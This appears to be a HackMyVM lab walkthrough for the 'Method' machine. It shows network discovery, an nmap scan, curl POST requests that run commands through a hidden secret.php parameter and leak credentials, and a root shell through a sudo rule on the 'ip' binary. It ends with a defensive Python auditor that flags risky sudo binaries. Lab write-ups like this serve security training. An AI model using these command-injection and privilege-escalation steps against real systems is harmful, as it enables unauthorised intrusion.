Method – Writeup – HackMyVM – Walkthrough

Method is an easy machine by avijneyam from the HackMyVM platform. This machine requires a bit of enumeration and understanding of web technology. Once we get the foothold, this is a piece of cake. The machine works quite well on VirtualBox.

Link to the machine: https://hackmyvm.eu/machines/machine.php?vm=Method

Identify the target

As usual, I started the exploitation by finding the IP address of the target. This can easily be done using tools like netdiscover, arp-scan, fping, etc.

sudo netdiscover -r 10.0.0.0/24
The IP address of the target is 10.0.0.85

Scan open ports

Next, I scanned open ports on the target.

nmap -v -T4 -p- -sC -sV -oN nmap.log 10.0.0.85
The Nmap scan results

Here, we only have ports 22 and 80 to enumerate further.

Enumerate the webserver

There are some rabbit holes in the machine. However, using nikto, we can find the thing we want. We can also do the same manually. The main thing in this machine is the sitemap.xml file.

The sitemap.xml file

This is a major hint and also a major distraction. Here, if we look closely, there is an ‘index.htm?vm=Brain’ part in the URL. We know that HackMyVM has PHP in its backend and there is no such URL. But we can look for index.htm on the server.

The index.htm page

Let’s check the source of the page.

The source page

There is a hidden form that raises suspicion. The form has an input named “HackMyVM”.

curl 'http://10.0.0.85/secret.php?HackMyVM=id'
The GET method gives a message

It looked like GET was not the correct method. So, I sent the same request using the POST method.

curl -X POST 'http://10.0.0.85/secret.php' -d 'HackMyVM=id' -H 'Content-Type: application/x-www-form-urlencoded'
The POST method gives remote command execution

Furthermore, we can also spawn a reverse shell by encoding the reverse shell spawning command in URL-encoded format. However, I checked the source of the secret.php page to get the username and password.

curl -X POST 'http://10.0.0.85/secret.php' -d 'HackMyVM=cat secret.php' -H 'Content-Type: application/x-www-form-urlencoded'
The credentials of the user prakasaka

Privilege escalation

I logged in as the user prakasaka using the SSH server.

The SSH shell of the user prakasaka

Then, I checked the sudo permissions, which gave me a root shell through the “ip” binary.

sudo -l
The sudo permissions of prakasaka

Reference: https://gtfobins.github.io/gtfobins/ip/#sudo

sudo ip netns add foo
sudo ip netns exec foo /bin/bash
sudo ip netns delete foo
The root shell
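
From the defender's side, a sudo rule like the one used above can be caught by auditing `sudo -l` output for binaries that are able to run other programs. The following is an added example, not part of the original write-up: the function name, the entries in RISKY other than `ip`, and the sample `sudo -l` output are assumptions constructed for illustration.

```python
import os
import re

# Illustrative subset of binaries with a documented sudo escape on GTFOBins.
# "ip" is the one used in this walkthrough; the rest are assumptions to extend.
RISKY = {"ip", "find", "vim", "less", "awk", "env"}

# Constructed `sudo -l` output (not captured from the Method machine).
SAMPLE = """\
Matching Defaults entries for alice on host:
    env_reset, mail_badpass

User alice may run the following commands on host:
    (ALL : ALL) NOPASSWD: /bin/ip
    (root) /usr/bin/whoami, /usr/bin/find
    (root) NOPASSWD: /usr/sbin/ip addr show
"""

RULE = re.compile(r"^\s+\(([^)]*)\)\s*(.+)$")   # "    (runas) commands"
TAGS = re.compile(r"^(?:[A-Z_]+:\s*)+")         # "NOPASSWD: SETENV: "


def audit_sudo_rules(sudo_l_output):
    """Return (runas, command, nopasswd, severity) for each risky rule."""
    findings = []
    for line in sudo_l_output.splitlines():
        rule = RULE.match(line)
        if not rule:
            continue
        runas, commands = rule.groups()
        nopasswd = False
        for cmd in re.split(r"(?<!\\),\s*", commands):  # keep escaped commas
            tags = TAGS.match(cmd)
            if tags:  # a tag stays in force for later commands in the rule
                for name in re.findall(r"[A-Z_]+", tags.group()):
                    if name in ("NOPASSWD", "PASSWD"):
                        nopasswd = name == "NOPASSWD"
                cmd = cmd[tags.end():]
            parts = cmd.split()
            if not parts:
                continue
            if parts[0] != "ALL" and os.path.basename(parts[0]) not in RISKY:
                continue
            # No arguments listed: sudo accepts any arguments (high).
            # Arguments listed: only matching arguments are permitted (review).
            severity = "high" if len(parts) == 1 else "review"
            findings.append((runas.strip(), cmd.strip(), nopasswd, severity))
    return findings
```

Calling `audit_sudo_rules(SAMPLE)` flags the unrestricted `/bin/ip` and `/usr/bin/find` rules as high and the argument-pinned `ip addr show` rule as review.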
